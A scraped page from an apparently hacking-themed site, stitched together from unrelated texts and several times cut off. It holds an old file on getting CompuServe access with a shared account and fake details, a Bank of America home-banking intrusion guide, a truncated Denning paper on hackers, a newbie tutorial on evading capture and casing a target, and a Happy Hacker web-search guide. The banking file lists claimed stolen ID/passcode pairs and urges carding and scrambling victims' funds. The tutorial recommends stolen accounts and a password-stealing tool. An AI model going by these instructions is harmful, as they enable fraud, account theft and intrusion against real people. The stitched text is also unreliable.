Logging on to Compuserve
————————
In order to create a Ziff Account on CompuServe you need …
1) A Telenet, Tymnet, Or CIS Port
2) A Credit Card
3) Above the IQ of a houseplant

That is all you need, I know for some of you the 3rd one is
tough, but try. Ok, you have all this, call your local port, logon to
CIS, then you should get a [User ID:] Prompt, type [177000,5000], this
is the Ziff PCMagnet User Id. Now, if you entered it correctly, then you
should get the [Password:] Prompt, at This type [Pc*Magnet]. You will
next be givena Welcome Message, then, you will get yet another Prompt. It
should ask you for your Agreement Number, type [Z10D8810]. That is the
end of the prompts. Here’s where the IQ of above a houseplant comes into
play.You now have to think. It will ask you various questions,
ranging from your country to your Social Security number. Answer them
however you want, but I wouldn’t use your real info. If you want the
second password (Needed to access some things), you will have to give an
address where you can drop by and pick it up. Some ideas are sending to
your neighbors,but use your last name, it will end up at your house. That
isn’t the safest thing. Or you can rent a Post Office box for about 6
months. Once you have done all this, and answer the questions, and
read the propoganda, you will see [Entering PCMagnet]. You are done.

So what do I do Now?
——————–
Ok, if you get this far, you have the IQ of above your fern.
You can go one of two places, CIS or PCMagnet (Where you are now).
You can stay in PCMagnet, but there isn’t much there. So, I would
type [Go Cis] This will bring you to Compuserve. Once on CIS, you can do
many thing, ranging from downloading files, to real time chat on forums
to online games.

Project Numbers
—————
Some times I will refer to the word Project Number, that is
the same thing as a User ID. Excluding the digits after the comma. If
you see an ID that is [72311,27] then the that User ID’s Project
Number is[72311]. Simple Eh?

[70000,xxx] – Security Personel or Important Employes
[70003,xxx] – Complementary Account
[70004,xxx] – CompuServe Employe
[70005,xxx] – Radio Shack *Demo* Account. (R Flagged)
[70006,xxx] – Normal Compuserve Employe (Sometimes Wizards)
[70007,xxx] – Complementary Account

[70000,753] – Dan’l, Ghost, or Dan Piskur
[70006,522] – LooLoo, Myrtl, or Patrica Phelps

The [70000] Projects are very interesting accounts, they have
very high powered Flags. (Incedently, a Flag is an option set on
the user account) These accounts have the capability to ‘Hang you up’
from the system. These are the only such account that can do so.
But as you will see, they can make things very difficult without
hanging you up. A non [70000] project can get you ‘Hung up’, they
have to call Customer Service and tell them to Initilize your Port.
Thus hanging you up. But only the [70000] project can suspend your
account. The main person to look out for is [70000,753 - Dan Piskur]
he is the Head of Security. His job is to find you and suspend your
account. He does not hesitate to do this.

The [70006] is also another intersting Project. These
accounts are USUALLY ‘Wizards’ (A Wizard is a user with very high access
Flags) That does not mean all [70006,xxx] are Wizards, but most are.
So if you see the ID [70006,522] that is a very high accessed
Wizard, she usually uses the name [*LooLoo*] she has Sysop Flags on
all forums, where most Sysops only have it on their specific
forum. She also has the job of finding you , but she must report to
Dan’l to get you suspended. But don’t take her for granted, she has
the C Flag, she can stop you from talking, you can function
normally,but you can not talk in whatever Confrence Area she has
/gag’ed you on. (/gag is the Command to stop you from talking) She then
reports the User ID to Dan’l. He suspends you. Case Closed.

Invisable Sysops
—————-
Sysops with the C Flag can make them selves invisable while
in Confrence. But this has one bug in it. If you do a [/ust]
while in Confrence, the Inviso sysop will not appear, but if you
exit [/ex] and do a [ust] at the ! Prompt, they will appear.
Another way is to count the members it say are in CO at the Forum Top
menu [4. Confrencing (9 Participating)] and you go into CO,
and do a ust, count the people, in all channels and Tlk, if there
is an Inviso, there will be one less person when you count the
Ust.Maybe more if there are more Inviso’s.

Glossary
——–

Flags : Specific Options on your account.
-C Flag : Specific Account Option – Gives the use of the
/wi commands at CO. (Syntax [/wi ?])
Free Flag : Specific Account Option – Makes time in a
specific
forum free. (Ususally 70003 and 70007)
-L Flag : Specific Account Option – Locks a your account
out of a forum.
-R Flag : Specific Account Option – Read Only, means that
the account can not write to the system, read
and download only. (See also Radio Shack Demo)
Gag’ed : An account flag, if you have this flag, you can
not speak while you are in CO or CB. You can not
be seen in the User Listing, except by yourself.
A quick test for this flags is Paging yourself.
If you are gag’ed, there are three ways of
getting
rid of this flag, but you have no control over
them
– 1 – Have the Sysop who gag’ed you ungag you.
Only the sysop who gag’ed you can Ungag
you!
– 2 – Wait till 5am, when the system resets and
it will clear the flag. (Useful only on
CB)
– 3 – The best. When everyone leaves the CO you
were in, your flag will automaticly clear.
[Note. When you are gag'ed, you are only gag'ed
in that specific Forum/Co]
Inviso : When a Sysop is Invisable to all others, but
other
sysops. (See also Invisable Sysops)
Project No: The Prefix of the User ID is sometimes called
a Project Number.
Wizard : An Account with capabilites of incredible
capacity.
[Usually 70000 or 70006] (Not always)

Credits
——-
Some of this information was taken from a Phrack File, but
98% of it is mine. So please keep it as it is. I would like to thank
the following people for help.
Rigor Mortis : For his help with Compuserve when I started
out.
Matt E. : (A CIS Forum Sysop) for his explaination of
the
project numbers, and security flags.

Call
—-
P-80 Systems – [304/744-2253]
RipCo – [312/528-5020]

Related posts

• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking on XP (0)
• Hackers Who Break into Computer Systems (0)
• Hackers A-Z (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)
• Hacking password protected site (0)

This file explains the basics of hacking the Bank of America Home Banking
System. The information you can get from this system is great, but there are
limitations. Don’t expect to be able to find a certain persons information,
when hacking on this system you go for anyones account you can find, there is
NO WAY you can find a certain persons account. The reason being, one the person
must have requested to have the Home Banking service. The second being you have
to have that persons last 9 digits on their versatel card. So as you can see
the chances are against you finding a certian person. The uses of this system
are still many if you are a carder. You can get a persons Visa and Master Card
numbers. Once you have these you may card an Item and then pay it off. I will
go into further details following the intro.

Connecting With the System
————————–

To connect with the Bank’s computer call your local Tymnet service and type
the following:

PLEASE ENTER YOUR TERMINAL IDENTIFIER: A
PLEASE LOGIN: HOMEBANKLA
HOMEBANKSF

For a little information about the login, as far as I have done is checked my
area and in California the two biggest closest cities to where I live is
San Francisco & Los Angeles. Which is the ending SF & LA. Listed below are a
FEW of the other abreviations for the other states.
-
Alaska-AN-Anchorage                  :   Maryland-BM-Baltamore
Alabama-MT-Montgomery                :   Maine-PT-Portland
Arkansas-LR-Little Rock              :   Michigan-AA-Ann Arbor
Arizona-PH-Phoenix                   :            BC-Battle Creek
British Columbia-PG-Prince George    :   Minnesota-MN-Minneapolis
Califonia-LA-Los Angeles             :   Missouri-CB-Columbia
SF-San Francisco           :   Mississippi-JK-Jackson
LB-Long Beach              :   Montana-BL-Billings
Colorado-DN-Denver                   :   North Carolina-HP-High Point
Connecticut-BP-Bridgeport            :   North Dakota-GF-Grand Forks
District of Columbia-WA-Washington   :   Nebraska-GI-Grand Island
Delaware-NW-NewarkWilming            :   New Hampshire-CN-Concord
Florida-BR-Boca Raton                :   New Jersey-AC-Atlantic City
Hawaii-HN-Honolulu                   :   New Mexico-AB-Albuquerque
Iowa-DM-Des Moines                   :   Nevada-LV-Las Vegas
Idaho-BO-Boise                       :   New York-DP-Deer Park
Illinois-CH-Chicago                  :   Oklahoma-OC-Oklahoma City
Indiana-FW-Ft. Wayne                 :   Pennsylvania-PI-Pitsburgh
Kansas-KC-Kansas City                :   Texas-DL-Dallas
Kentucky-BG-Bowling Green            :   Virginia-FF-Fairfax
Massachusetts-BT-Boston              :   Washington-SE-Seatle
-

Connection Established
———————-

After you have connected with the system you will get the following prompts:

HOST CONNECTED:
ID#:

The Identification number is a “)” followed by the last nine digits of someones
versatel card. The first two digits in a zone are ALWAYS the same. These first
two digits are like the area codes for a Versatel Card. The easiest way to find
out what the two numbers for your area are is look at your parents or your card.
After you have gotten the first two digits least that lower the nine digit code
down to seven. The ID# is what I have found the hardest to get a hold of. So
once you have that all your troubles are over!

PASSCODE:

This is alot easier to get than the ID# like on most systems that have users
that are not aware of the dangers of having a code that is obvious, this system
also has unskilled people using it. The passwords are VERY easy to guess. The
only thing that makes it a little harder for hacking is they do not echo the
characre is one quick way around that, HALF DUPLEX.

Here are two ID#’s and Passcodes that I have hacked, please use them sparingly
and dont do any major damage.

ID#   :     PASSCODE
)694532344: VERTELL
)692313425: MAXCREDIT

Benifits of B of A Over TRW
—————————

On this system not only can you cedit their credit information after you have
it and card an Item you can scramble their funds around and they will NEVER
know what hit them. The best thing to do is wait for three days after you have
carded the item, then call the system and pay the item off and then trnasfer
their funds from their checking to their Credit Card and vise versa and then
go into the savings and throw that money were ever. It works great because
after they get everything straight agian they will notice some money gone,
blame it on the bank and never think of out side “help”.

Main Menu Commands
——————

Here is what you can expect to find once you login to the system:

COMMAND LIST
————
1-MAIN MENU
2-PAY BILLS
3-TRANSFER FUNDS
4-BALANCE INQUIRY
5-REVIEW OR CANCLE
6-ELECTRONIC STATEMENT
7-ELECTRONIC MAIL
8-LOG OFF

The Following commands can be entered at any “?” prompt and do the following:

?-COMMAND LIST
Q-RETURN TO THE MAIN MENU
B-BEGIN FUNCTION AGIAN
P-NEXT PAGE

DOWNLOADED FROM P-80 SYSTEMS……

Related posts

• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking on XP (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers A-Z (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)
• How to Repair a Slow Computer? (0)

Concerning Hackers Who Break into Computer Systems

Dorothy E. Denning
Digital Equipment Corp., Systems Research Center
130 Lytton Ave., Palo Alto, CA 94301
415-853-2252, denning@src.dec.com

Abstract

A diffuse group of people often called “hackers” has been
characterized as unethical, irresponsible, and a serious danger to
society for actions related to breaking into computer systems.  This
paper attempts to construct a picture of hackers, their concerns,
and the discourse in which hacking takes place.  My initial findings
suggest that hackers are learners and explorers who want to help
rather than cause damage, and who often have very high standards
of behavior.  My findings also suggest that the discourse surrounding
hacking belongs at the very least to the gray areas between larger
conflicts that we are experiencing at every level of society and
business in an information age where many are not computer literate.
These conflicts are between the idea that information cannot be owned
and the idea that it can, and between law enforcement and the First
and Fourth Amendments.  Hackers have raised serious issues about
values and practices in an information society.  Based on my findings,
I recommend that we work closely with hackers, and suggest several
actions that might be taken.

1.  Introduction

The world is crisscrossed with many different networks that are used
to deliver essential services and basic necessities — electric power,
water, fuel, food, goods, to name a few.  These networks are all
publicly accessible and hence vulnerable to attacks, and yet virtually
no attacks or disruptions actually occur.

The world of computer networking seems to be an anomaly in the
firmament of networks.  Stories about attacks, breakins, disruptions,
theft of information, modification of files, and the like appear
frequently in the newspapers.  A diffuse group called “hackers”
is often the target of scorn and blame for these actions.  Why are
computer networks any different from other vulnerable public networks?
Is the difference the result of growing pains in a young field?
Or is it the reflection of deeper tensions in our emerging information
society?

There are no easy or immediate answers to these questions.  Yet it
is important to our future in a networked, information-dependent
world that we come to grips with them.  I am deeply interested in
them.  This paper is my report of what I have discovered in the early
stages of what promises to be a longer investigation.  I have
concentrated my attention in these early stages on the hackers
themselves.  Who are they?  What do they say?  What motivates them?
What are their values?  What do that have to say about public policies
regarding information and computers?  What do they have to say about
computer security?

From such a profile I expect to be able to construct a picture of
the discourses in which hacking takes place.  By a discourse I mean
the invisible background of assumptions that transcends individuals
and governs our ways of thinking, speaking, and acting.  My initial
findings lead me to conclude that this discourse belongs at the very
least to the gray areas between larger conflicts that we are
experiencing at every level of society and business, the conflict
between the idea that information cannot be owned and the idea that
it can, and the conflict between law enforcement and the First and
Fourth Amendments.

But, enough of the philosophy.  On with the story!

2.  Opening Moves

In late fall of 1989, Frank Drake (not his real name), Editor of
the now defunct cyberpunk magazine W.O.R.M., invited me to be
interviewed for the magazine.  In accepting the invitation, I hoped
that something I might say would discourage hackers from breaking
into systems.  I was also curious about the hacker culture.  This
seemed like a good opportunity to learn about it.

The interview was conducted electronically.  I quickly discovered
that I had much more to learn from Drake’s questions than to teach.
For example, he asked: “Is providing computer security for large
databases that collect information on us a real service?  How do
you balance the individual’s privacy vs. the corporations?”  This
question surprised me.  Nothing that I had read about hackers ever
suggested that they might care about privacy.  He also asked: “What
has [the DES] taught us about what the government’s (especially NSA’s)
role in cryptography should be?”  Again, I was surprised to discover
a concern for the role of the government in computer security.  I
did not know at the time that I would later discover considerable
overlap in the issues discussed by hackers and those of other computer
professionals.

I met with Drake to discuss his questions and views.  After our
meeting, we continued our dialog electronically with me interviewing
him.  This gave me the opportunity to explore his views in greater
depth.  Both interviews appear in “Computers Under Attack,”
edited by Peter Denning [DenningP90].

My dialog with Drake increased my curiosity about hackers.  I read
articles and books by or about hackers.  In addition, I had discussions
with nine hackers whom I will not mention by name.  Their ages ranged
from 17 to 28.

The word “hacker” has taken on many different meanings ranging
from 1) “a person who enjoys learning the details of computer systems
and how to stretch their capabilities” to 2) “a malicious or
inquisitive meddler who tries to discover information by poking around
.. possibly by deceptive or illegal means …” [Steele83]  The
hackers described in this paper satisfy both of these definitions,
although all of the hackers I spoke with said they did not engage
in or approve of malicious acts that damage systems or files.  Thus,
this paper is not about malicious hackers.  Indeed, my research so
far suggests that there are very few malicious hackers.   Neither
is this paper about career criminals who, for example, defraud
businesses, or about people who use stolen credit cards to purchase
goods.  The characteristics of many of the hackers I am writing about
are summed up in the words of one of the hackers: “A hacker is someone
that experiments with systems… [Hacking] is playing with systems
and making them do what they were never intended to do.  Breaking
in and making free calls is just a small part of that.  Hacking is
also about freedom of speech and free access to information — being
able to find out anything.  There is also the David and Goliath side
of it, the underdog vs. the system, and the ethic of being a folk
hero, albeit a minor one.”

Richard Stallman, founder of the Free Software Foundation who calls
himself a hacker according to the first sense of the word above,
recommends calling security-breaking hackers “crackers”
[Stallman84].  While this description may be more accurate, I shall
use the term “hacker” since the people I am writing about call
themselves hackers and all are interested in learning about computer
and communication systems.  However, there are many people like
Stallman who call themselves hackers and do not engage in illegal
or deceptive practices; this paper is also not about those hackers.

In what follows I will report on what I have learned about hackers
from hackers.  I will organize the discussion around the principal
domains of concerns I observed.  I recommend Meyer’s thesis [Meyer89]
for a more detailed treatment of the hackers’ social culture and
networks, and Meyer and Thomas [MeyerThomas90] for an interesting
interpretation of the computer underground as a postmodernist rejection
of conventional culture that substitutes “rational technological
control of the present for an anarchic and playful future.”

I do not pretend to know all the concerns that hackers have, nor
do I claim to have conducted a scientific study.  Rather, I hope
that my own informal study motivates others to explore the area
further.  It is essential that we as computer security professionals
take into account hackers’ concerns in the design of our policies,
procedures, laws regulating computer and information access, and
educational programs.  Although I speak about security-breaking hackers
as a group, their competencies, actions, and views are not all the
same.  Thus, it is equally important that our policies and programs
take into account individual differences.

In focusing on what hackers say and do, I do not mean for a moment
to set aside the concerns of the owners and users of systems that
hackers break into, the concerns of law enforcement personnel, or
our own concerns as computer security professionals.  But I do
recommend that we work closely with hackers as well as these other
groups to design new approaches and programs for addressing the
concerns of all.   Like ham radio operators, hackers exist, and it
is in our best interest that we learn to communicate and work with
them rather than against them.

I will suggest some actions that we might consider taking, and I
invite others to reflect on these and suggest their own.  Many of
these suggestions are from the hackers themselves; others came from
the recommendations of the ACM Panel on Hacking [Lee86] and from
colleagues.

I grouped the hackers’ concerns into five categories: access to
computers and information for learning; thrill, excitement and
challenge; ethics and avoiding damage; public image and treatment;
and privacy and first amendment rights.  These are discussed in
the next five subsections.  I have made an effort to present my
findings as uncritical observations.  The reader should not infer
that I either approve or disapprove of actions hackers take.

3.  Access to Computers and Information for Learning

Although Levy’s book “Hackers” [Levy84] is not about today’s
security-breaking hackers, it articulates and interprets a “hacker
ethic” that is shared by many of these hackers.  The ethic includes
two key principles that were formulated in the early days of the
AI Lab at MIT: “Access to computers — and anything which might
teach you something about the way the world works — should be
unlimited and total,” and “All information should be free.”  In
the context in which these principles were formulated, the computers
of interest were research machines and the information was software
and systems information.

Since Stallman is a leading advocate of open systems and freedom
of information, especially software, I asked him what he means by
this.  He said: “I believe that all generally useful information
should be free. By `free’ I am not referring to price, but rather
to the freedom to copy the information and to adapt it to one’s own
uses.”  By “generally useful” he does not include confidential
information about individuals or credit card information, for example.
He further writes: “When information is generally useful,
redistributing it makes humanity wealthier no matter who is
distributing and no matter who is receiving.”  Stallman has argued
strongly against user interface copyright, claiming that it does
not serve the users or promote the evolutionary process [Stallman90].

I asked hackers whether all systems should be accessible and all
information should be free.  They said that it is OK if some systems
are closed and some information, mainly confidential information
about individuals, is not accessible.  They make a distinction between
information about security technology, e.g., the DES, and confidential
information protected by that technology, arguing that it is the
former that should be accessible.   They said that information hoarding
is inefficient and slows down evolution of technology.  They also
said that more systems should be open so that idle resources are
not wasted.  One hacker said that the high costs of communication
hurts the growth of the information economy.

These views of information sharing seem to go back at least as far
as the 17th and 18th Centuries.  Samuelson [Samuelson89] notes that
“The drafters of the Constitution, educated in the Enlightenment
tradition, shared that era’s legacy of faith in the enabling powers
of knowledge for society as well as the individual.”  She writes
that our current copyright laws, which protect the expression of
information, but not the information itself, are based on the belief
that unfettered and widespread dissemination of information promotes
technological progress. (Similarly for patent laws which protect
devices and processes, not the information about them.)  She cites
two recent court cases where courts reversed the historical trend
and treated information as ownable property.  She raises questions
about whether in entering the Information Age where information is
the source of greatest wealth, we have outgrown the Enlightenment
tradition and are coming to treat information as property.

In a society where knowledge is said to be power, Drake expressed
particular concern about what he sees as a growing information gap
between the rich and poor.  He would like to see information that
is not about individuals be made public, although it could still
be owned.  He likes to think that companies would actually find it
to their advantage to share information.  He noted how IBM’s disclosure
of the PC allowed developers to make more products for the computers,
and how Adobe’s disclosure of their fonts helped them compete against
the Apple-Microsoft deal.  He recognizes that in our current political
framework, it is difficult to make all information public, because
complicated structures have been built on top of an assumption that
certain information will be kept secret.  He cites our defense policy,
which is founded on secrecy for military information, as an example.

Hackers say they want access to information and computing and network
resources in order to learn.  Both Levy [Levy84] and Landreth
[Landreth89] note that hackers have an intense, compelling interest
in computers and learning, and many go into computers as a profession.
Some hackers break into systems in order to learn more about how
the systems work.  Landreth says these hackers want to remain
undiscovered so that they can stay on the system as long as possible.
Some of them devote most of their time to learning how to break the
locks and other security mechanisms on systems; their background
in systems and programming varies considerably.  One hacker wrote
“A hacker sees a security hole and takes advantage of it because
it is there, not to destroy information or steal.  I think our
activities would be analogous to someone discovering methods of
acquiring information in a library and becoming excited and perhaps
engrossed.”

We should not underestimate the effectiveness of the networks in
which hackers learn their craft.  They do research, learn about
systems, work in groups, write, and teach others.  One hacker said
that he belongs to a study group with the mission of churning out
files of information and learning as much as possible.  Within the
group, people specialize, collaborate on research project, share
information and news, write articles, and teach other about their
areas of specialization.  Hackers have set up a private system of
education that engages them, teaches them to think, and allows them
to apply their knowledge in purposeful, if not always legal,
activity.   Ironically, many of our nation’s classrooms have been
criticized for providing a poor learning environment that seems to
emphasize memorization rather than thinking and reasoning.  One hacker
reported that through volunteer work with a local high school, he
was trying to get students turned on to learning.

Many hackers say that the legitimate computer access they have through
their home and school computers do not meet their needs.  One student
told me that his high school did not offer anything beyond elementary
courses in BASIC and PASCAL, and that he was bored by these.  Hans
Huebner, a hacker in Germany who goes by the name Pengo, wrote in
a note to the RISKS Forum [Huebner89] : “I was just interested in
computers, not in the data which has been kept on their disks. As
I was going to school at that time, I didn’t even have the money
to buy [my] own computer.  Since CP/M (which was the most sophisticated
OS I could use on machines which I had legal access to) didn’t turn
me on anymore, I enjoyed the lax security of the systems I had access
to by using X.25 networks.  You might point out that I should have
been patient and wait[ed] until I could go to the university and
use their machines.  Some of you might understand that waiting was
just not the thing I was keen on in those days.”

Brian Harvey, in his position paper [Harvey86] for the ACM Panel on
Hacking, claims that the computer medium available to students, e.g.,
BASIC and floppy disks, is inadequate for challenging intellectual
work.  His recommendation is that students be given access to real
computing power, and that they be taught how to use that power
responsibly.  He describes a program he created at a public high school
in Massachusetts during the period 1979-1982.  They installed a
PDP-11/70 and let students and teachers carry out the administration
of the system.  Harvey assessed that putting the burden of dealing
with the problems of malicious users on the students themselves was
a powerful educational force.  He also noted that the students who
had the skill and interest to be password hackers were discouraged
from this activity because they also wanted to keep the trust of
their colleagues in order that they could acquire “superuser” status
on the system.

Harvey also makes an interesting analogy between teaching computing
and teaching karate.  In karate instruction, students are introduced
to the real, adult community.  They are given access to a powerful,
deadly weapon, and at the same time are taught discipline and to
not abuse the art.  Harvey speculates that the reason that students
do not misuse their power is that they know they are being trusted
with something important, and they want to live up to that trust.
Harvey applied this principle when he set up the school system.

The ACM panel endorsed Harvey’s recommendation, proposing a
three-tiered computing environment with local, district-wide, and
nation-wide networks.  They recommended that computer professionals
participate in this effort as mentors and role models.   They also
recommended that outside of schools, government and industry be
encouraged to establish regional computing centers using donated
or re-cycled equipment; that students be apprenticed to local companies
either part-time on a continuing basis or on a periodic basis; and,
following a suggestion from Felsenstein [Felsenstein86] for a
“Hacker’s League,” that a league analogous to the Amateur Radio
Relay League be established to make contributed resources available
for educational purposes.

Related posts

• Telnet: the Number One Hacker Tool (0)
• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking on XP (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers Who Break into Computer Systems (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Hacking password protected site (0)

[I Want to Start at the Start]

[I Want to Go Straight to Hacking]

INTRODUCTION:

A little background is needed before we get into hacking techniques.

When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the froggy.com.au ISP (Internet Service Provider), he will be given:

(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.

This login name and password will usually give you access to all of Fred’s services – his mail, news services and web pages. There is also the ‘root’ account, which has it’s own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’, in this help file.

[Ok, I want to move to the 'anatomy of the hack']

[I know all this, let me move straight to hacking]

[I don't have a clue what you're on about, let me read some backgroundon this so called "Internet" you keep referring to <http://www.cyberarmy.com/tute/htext1.shtml>]

THE ANATOMY OF THE ‘HACK’:

There are two main ways to break into a system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You can try to get in by finding the combination of the vault. This is like finding the password. It’s how you are meant to get in. The second way is by using dynamite. You forget all about the ‘proper’ way to get in. This is like using ‘exploits’, or weaknesses in the servers operating system to gain access.

[Ok, Let's Go. Tell Me About Not Getting Caught]

[Stuff it, I know how to not get caught, on to the techniques!]

‘DON’T GET CAUGHT’:

Hacking is illegal, and it is very easy to trace you if froggy.com.au realizes you hacked them. Wherever you go,
your IP number (your computer’s unique identification) is left and often logged. Solutions:

1. When you set up your account with an ISP, give a false name and address.

[Nah, I can't be bothered, what other things can I do?]

[Ok, I used this trick. What else can I do?]

[Stuff it, I know how to not get caught, on to the techniques!]

DON’T GET CAUGHT’:

2. Hack using a filched account (stolen password, etc.). A tool called Dripper <http://www.cyberarmy.com/files/dripper.zip> can steal passwords for you from public net cafes and libraries.

[Nah, just tell me something easy I can do right now]

[Ok, done. Anything else I should do?]

DON’T GET CAUGHT’:

3. Port your connection through something else.

An easy way to do this is to change your proxy settings. By using the proxy settings meant for a different ISP, it can look like you are surfing from wherever that ISP is. A list of proxies you can use is here <http://www.cyberarmy.com/lists/proxy>.

You should also do any important info gathering through the IP Jamming Applet on the Cyberarmy.Com <http://www.cyberarmy.com> to hide your IP.

If you want super anonymity, you should be surfing in an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.

[I don't understand about the proxy settings thing, let me read more <http://www.cyberarmy.com/tute/htext3.shtml>]

[Ok, I am wired for hyper stealth... Now, I want to HACK!]

INFO GATHERING:

To start off, you will probably need to gather information about www.froggy.com.au using internet tools.

[Ok, how?]

[Give me some reading to do about info gathering <http://www.cyberarmy.com/tute/htext2.shtml>]

[No, I've already got all the info, just tell me what to do]

DIRT DIGGING STAGE:

We are now taking the first steps of any hack… Info Gathering.

You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring the www.froggy.com.au ’s web page up in the IP Jammer’s window. You can load the IP Jamming applet on the Cyberarmy.Com <http://www.cyberarmy.com>.

[Ok, What Now?]

CASE THE JOINT:

1. First, check out the site. Take down any email addresses, copy down the HTML of important pages.

[Done... What Else?]

THE OLD BOUNCING MAIL TRICK:

2. Send a mail that will bounce to the site. If the site is www.froggy.com.au , send a mail to blahblahblah@froggy.com.au . It will bounce back to you and give you information in its header.

Copy the information from the headers down.

(To maintain anonymity, it might be a good idea to send and receive the mail from a free web based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through the logs after they are hacked.)

[Done... What Else?]

Related posts

• Telnet: the Number One Hacker Tool (0)
• What To Look For In A Code Hacking Program (0)
• Telnet trick port 25 (0)
• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking password protected site (0)
• Hacking on XP (0)
• Hacking For Newbies (0)
• Hacking for Dummies Volume 2 (0)

But, but, how do we know what are the wrong questions to ask? OK, I sympathize with your problems because I get flamed a lot, too. That’s partly because I sincerely believe in asking dumb questions. I make my living asking dumb questions. People pay me lots of money to go to conferences, call people on the phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them. And, guess what, sometimes the dumbest questions get you the best answers. So that’s why you don’t see me flaming people who ask dumb questions.

********************************************************
Newbie note: Have you been too afraid to ask the dumb question, “What is a flame?” Now you get to find out! It is a bunch of obnoxious rantings and ravings made in email or a Usenet post by some idiot who thinks he or she is proving his or her mental superiority through use of foul and/or impolite language such as “you suffer from rectocranial inversion,” f*** y***, d****, b****, and of course @#$%^&*! This newbie note is my flame against those flamers to whom I am soooo superior.
********************************************************

But even though dumb questions can be good to ask, you may not like the flames they bring down on you. So, if you want to avoid flames, how do you find out answers for yourself?

This Guide covers one way to find out hacking information without having to ask people questions: by surfing the Web. The other way is to buy lots and lots of computer manuals, but that costs a lot of money. Also, in some parts of the world it is difficult to get manuals. Fortunately, however, almost anything you want to learn about computers and communications is available for free somewhere on the Web.

First, let’s consider the Web search engines. Some just help you search the Web itself. But others enable you to search Usenet newsgroups that have been archived for many years back. Also, the best hacker email lists are archived on the Web, as well.

More how to search for hacker knowledge…

There are two major considerations in using Web search engines. One is what search engine to use, and the other is the search tactics themselves.

I have used many Web search engines. But eventually I came to the conclusion that for serious research, you only need two: Alavista (<http://altavista.digital.com/>)and Dejanews (<http://www.dejanews.com/>). Altavista is the best for the Web, while Dejanews is the best one for searching Usenet news groups. But, if you don’t want to take me at my word, you may surf over to a site with links to almost all the Web and Newsgroup search engines at <http://sgk.tiac.net/search/>.

But just how do you efficiently use these search engines? If you ask them to find “hacker” or even “how to hack,” you will get bazillions of Web sites and news group posts to read. OK, so you painfully surf through one hacker Web site after another. You get portentous-sounding organ music, skulls with red rolling eyes, animated fires burning, and each site has links to other sites with pretentious music and ungrammatical boastings about “I am 31337, d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my $%^&&*!” But somehow they don’t seem to have any actual information. Hey, welcome to the wannabe hacker world!

You need to figure out some words that help the search engine of your choice get more useful results. For example, let’s say you want to find out whether I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or merely some poser. Now the luser approach would to simply go to http://www.dejanews.com and do a search of Usenet news groups for “Carolyn Meinel,” being sure to click the “old” button to bring up stuff from years back. But if you do that, you get this huge long list of posts, most of which have nothing to do with hacking:

CDMA vs GSM – carolyn meinel <cmeinel@unm.edu> 1995/11/17

Re: October El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20

Re: Internic Wars MrGlucroft@psu.edu (The Reaver) 1995/11/30
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16

Re: Lyndon LaRouche – who is he? lness@ucs.indiana.edu (lester john ness) 1996/01/06

U-B Color Index observation data – cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13

Re: Mars Fraud? History of one scientist involved gksmiley@aol.com (GK Smiley) 1996/08/11

Re: Mars Life Announcement: NO Fraud Issue twitch@hub.ofthe.net 1996/08/12

Hackers Helper E-Zine wanted – rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06

Carolyn Meinel, Sooooooper Genius – nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node) 1996/12/12

Anyhow, this list goes on and on and on.

But if you specify “Carolyn Meinel hacker” and click “all” instead of “any” on the “Boolean” button, you get a list that starts with:

Media: “Unamailer delivers Christmas grief” -Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30 Cu Digest, #8.93, Tue 31 Dec 96 – Cu Digest (tk0jut2@mvs.cso.niu.edu)
<TK0JUT2@MVS.CSO.NIU.EDU> 1996/12/31

RealAudio interview with Happy Hacker – bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08

Etc.

This way all those posts about my boring life in the world of science don’t show up, just the juicy hacker stuff.

Now suppose all you want to see is flames about what a terrible hacker I am. You could bring those to the top of the list by adding (with the “all” button still on) “flame” or “f***” or “b****” being careful to spell out those bad words instead fubarring them with ****s. For example, a search on “Carolyn Meinel hacker flame” with Boolean “all” turns up only one post. This important tome says the Happy Hacker list is a dire example of what happens when us prudish moderator types censor naughty words and inane diatribes.

******************************************
Newbie note: “Boolean” is math term. On the Dejanews search engine they figure the user doesn’t have a clue of what “Boolean” means so they give you a choice of “any” or “all” and then label it “Boolean” so you feel stupid if you don’t understand it. But in real Boolean algebra we can use the operators “and” “or” and “not” on word searches (or any searches of sets). “And” means you would have a search that turns up only items that have “all” the terms you specify; “or” means you would have a search that turns up “any” of the terms. The “not” operator would exclude items that included the “not” term even if they have any or all of the other search terms. Altavista has real Boolean algebra under its “advanced”" search option.
******************************************

